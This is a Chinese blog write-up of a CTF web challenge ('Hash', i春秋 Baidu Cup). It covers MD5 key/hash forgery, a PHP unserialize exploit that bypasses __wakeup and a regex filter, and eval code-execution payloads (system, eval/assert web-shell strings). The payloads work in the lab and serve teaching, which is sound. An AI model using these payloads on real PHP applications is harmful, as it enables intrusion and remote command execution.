[i春秋]“百度杯”CTF比赛 十月场-Hash

最新推荐文章于 2023-11-22 22:40:23 发布
最新推荐文章于 2023-11-22 22:40:23 发布
阅读量590 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43818995/article/details/104164712
版权

 

前言

涉及知识点:反序列化、代码执行、命令执行

题目来自:i春秋 hash  如果i春秋题目有问题可以登录榆林学院信息安全协会CTF平台使用

或者利用本文章提供的源码自主复现

[i春秋]“百度杯”CTF比赛 十月场-Hash

点击hahaha进入下一个页面

进入之后我们发现这有一段英文说如果不是123 我们就可以获得flag 

 

我们分析URL key部分有个123 我们替换成122试试 试了之后不行我们看到hash的值一看就是md5密文直接拿去解密看看有什么发现

http://地址/index.php?key=123&hash=f9109d5f83921a551cf859f853afe7bb

 

 md5解密那个hash=kkkkkk01123  根据直觉把后三位替换成和我们key一致的 替换后hash=kkkkkk01122 然后cmd5把hash的值加密 重新组合url提交

//修改key hash的
payload:
http://地址/index.php?key=122&hash=e1ebb04a0a78afe23e2d542e72a25005

获得新的页面访问去。

 

访问获得这个页面的源码

 1  <?php
 2 class Demo {
 3     private $file = 'Gu3ss_m3_h2h2.php';
 4 
 5     public function __construct($file) {
 6         $this->file = $file;
 7     }
 8 
 9     function __destruct() {
10         echo @highlight_file($this->file, true);
11     }
12 
13     function __wakeup() {
14         if ($this->file != 'Gu3ss_m3_h2h2.php') {
15             //the secret is in the f15g_1s_here.php
16             $this->file = 'Gu3ss_m3_h2h2.php';
17         }
18     }
19 }
20 
21 if (isset($_GET['var'])) {
22     $var = base64_decode($_GET['var']);
23     if (preg_match('/[oc]:\d+:/i', $var)) {
24         die('stop hacking!');
25     } else {
26 
27         @unserialize($var);
28     }
29 } else {
30     highlight_file("Gu3ss_m3_h2h2.php");
31 }
32 ?>
View Code

 

 

 通过分析又发现了新的页面下一步我们就是要通过这个存在序列化漏洞的页面构造语法来获取the f15g_1s_here.php的源码。

 

1.绕过_wakeup()这个函数 因为我们在反序列化时会判断这个函数是否存在如果存在就执行替换成下面的页面 所以我们要阻止它运行

绕过_wakeup参考:https://www.cnblogs.com/xhds/p/12243760.html

 

 

 2.绕过过滤 首先这里是get接受之后进行base64的解码 有解码那我们构造后就要编码 ,然后正则表达式判断符不符合它们的条件 如果不符合则就能正常的执行unserialize()函数进行反序列化了

 

构造的序列化代码

$obj=new Demo('f15g_1s_here.php');
$s=serialize($obj);
$s=str_replace("4","+4",$s);
$s=str_replace(":1:",":8:",$s);
echo base64_encode($s);

 

序列化的payload:

http://URL/Gu3ss_m3_h2h2.php?var=TzorNDoiRGVtbyI6ODp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==

 

访问得到 f15g_1s_here.php 页面的源码 

 <?php
if (isset($_GET['val'])) {
    $val = $_GET['val'];
    eval('$value="' . addslashes($val) . '";');
} else {
    die('hahaha!');
}

?>

 构造代码执行的语法

第一个方法:

最终payload:

 http://eb85579d4d4149dd98fd95b033fde549c66f85c255ba4225.changame.ichunqiu.com/f15g_1s_here.php?val=${eval($_POST[0])}

菜刀连接获得flag

第二个方法:

payload:

http://eb85579d4d4149dd98fd95b033fde549c66f85c255ba4225.changame.ichunqiu.com/f15g_1s_here.php?val=${${system(ls)}}

第三种方法:

菜刀连接payload:

http://453467cea6b64556860e3339a9908319758cf61d8e1942f2.changame.ichunqiu.com/f15g_1s_here.php?val=${${assert($_POST[1])}}

 

 

 

http://eb85579d4d4149dd98fd95b033fde549c66f85c255ba4225.changame.ichunqiu.com/f15g_1s_here.php?val=${${system(ls)}}

笑花大王
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
百度CTF比赛 十月 Web-Hash
qq_34106499的博客
01-21 577
1. 细心查看源码 2. MD5加密与解密 3. PHP中序列化与反序列化的应用 4. 反序列化中正则表达式与强制文件名限制的绕过 5. base64加密与解密 6. eval函数中执行php源码的漏洞利用 7. eval函数中执行系统命令时绕过addslash函数
CTF-加密与解密(六)
→_→
08-07 4480
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 11.Hash还原 (来源:网络) 1.关卡描述 小明一直将电脑密码的Hash值写在标签纸上,结果一不小心墨水撒到了上面,只能看到前十位是c2979c7124,另外小明记得他的密码是4位的数字加字母,你能帮小明恢复密码的Hash值吗?(密码的Hash值即为Flag值) 2.解题步骤 2.1 通过分...
百度CTF比赛 十月 Hash
feng的博客
10-04 593
WP 这题也是学习到了很多新的姿势,是一个不错的题目。 WP 进入环境,点击haha,提示:you are 123;if you are not 123,you can get the flag。 再看看,发现get参数里有key=123&hash=f9109d5f83921a551cf859f853afe7bb f12查看源码,发现$hash=md5($sign.$key);the length of $sign is 8 因此我们需要知道$sign是多少。我利用在线md5解密工具,上面的hash
Hash扩展长度攻击及Hashdump的使用
最新发布
ZXT02的博客
11-22 538
Hash扩展长度攻击、Hashdump的使用和相关CTF题目
ctf-php反序列化绕过__wakeup
qq_32445755的博客
05-19 2097
注意:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以 __ 为前缀。 __wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。 部分代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 此时需要绕过__
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
CTF比赛编码工具Captfencoder-1.3.0
09-21
CaptfEncoder是一款跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、...Ascii Encoding Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) ...Tap Code(敲击码)
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用景: ... 其他说明: ...
百度CTF比赛 十月 Web-登录
qq_34106499的博客
02-18 1462
1. mysql盲注及脚本编写 2. .git泄露
百度CTF比赛 十月 writeup
weixin_45871855的博客
08-30 1197
分值:10分 类型:Misc题目名称:考眼力未解答 题目内容: gmbh{4d850d5c3c2756f67b91cbe8f046eebd} try to find the flag
百度CTF比赛 十月 Not Found
feng的博客
10-01 1797
前言 有一说一,这题还是挺阴间的。不过自己也是学习了新的姿势。 WP 进入之后提示404.php没有,然后扫一下目录发现1.php,访问也没有flag,再直接访问404.php是haha(出题人出来挨打)。之后进行一些尝试均已失败告终,去看了看WP。 首先就是直接访问网站的时候,响应头里有一个x-method是haha: 原来这是提示我们要换请求方式(出题人在哪????haha 什么呢????) HTTP请求就那几种方式,挨个试,在试到OPTIONS的时候出现了重定向: 点一下关注重定向: 发现请求变
i春秋百度CTF比赛 十月 hash writeup
weixin_43442029的博客
01-12 402
0x00 打开链接后,是一个hahaha的超链接,点进去以后要用key的值不是123的hash值过关,源代码里提示是MD5加密,在key前还有一段8位的sign值。 于是在网上找MD5解密的网站,解出来 sign = kkkkkk01 用122作为key,拼上sign的值,MD5加密后得到 hash = e1ebb04a0a78afe23e2d542e72a25005 输入正确的ke...
i春秋百度CTF比赛 十月 Backdoor
include_heqile的博客
09-20 2872
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;amp;r=0 这道题应该是我目前遇到的最有难度的一道题了,不过解题过程很有意思 首先还是进入题目链接,根据题目提示去查看网站目录下的敏感文件,我尝试了flag.php,但并未得到有价值的提示,然后我们再尝试一下敏感目录,当我在Challenges下输入.git的时候,出现了403 Forbidden错误,说明网站中存在...
百度CTF比赛 十月-EXEC
r00tnb的博客
07-26 1648
前言 这道题本来要用bash反弹shell的技术的,但是由于没有公网ip的服务器,我就用了命令盲注的方法,特此记录一下。 分析 打开链接题目提示no sign。查看源代码发现这一行 &lt;meta language='utf-8' editor='vim'&gt; 于是就想到了vim信息泄露,于是访问.index.php.swp成功下载了源代码 &lt;html&gt; ...
i春秋百度CTF比赛 十月 登陆
include_heqile的博客
10-11 2525
https://www.ichunqiu.com/battalion?t=1&amp;r=0 进入题目链接,是一个登陆框 尝试admin' or 1=1#,密码随便输,返回页面密码错误 再尝试用户名随便输,密码随便输,返回页面用户名不存在 确定为bool盲注 使用python脚本执行盲注: #-*- coding:utf-8 -*- from urllib.request import urlop...
i春秋百度CTF比赛 十月 Gift
include_heqile的博客
10-24 2471
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 进入题目链接,是一张黑人问号图片: 直接使用burp suite抓包送到Repeater模块,检查发送和相应报文的HTTP头部字段,并未发现可疑字段,图片是base64编码,点击href链接,依然还是刚的页面,尝试更改请求方法,将GET更改为POST,响应如下: 如果了解过Django的话应该很容易看...
百度CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
福建闽盾 ctf比赛题目
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值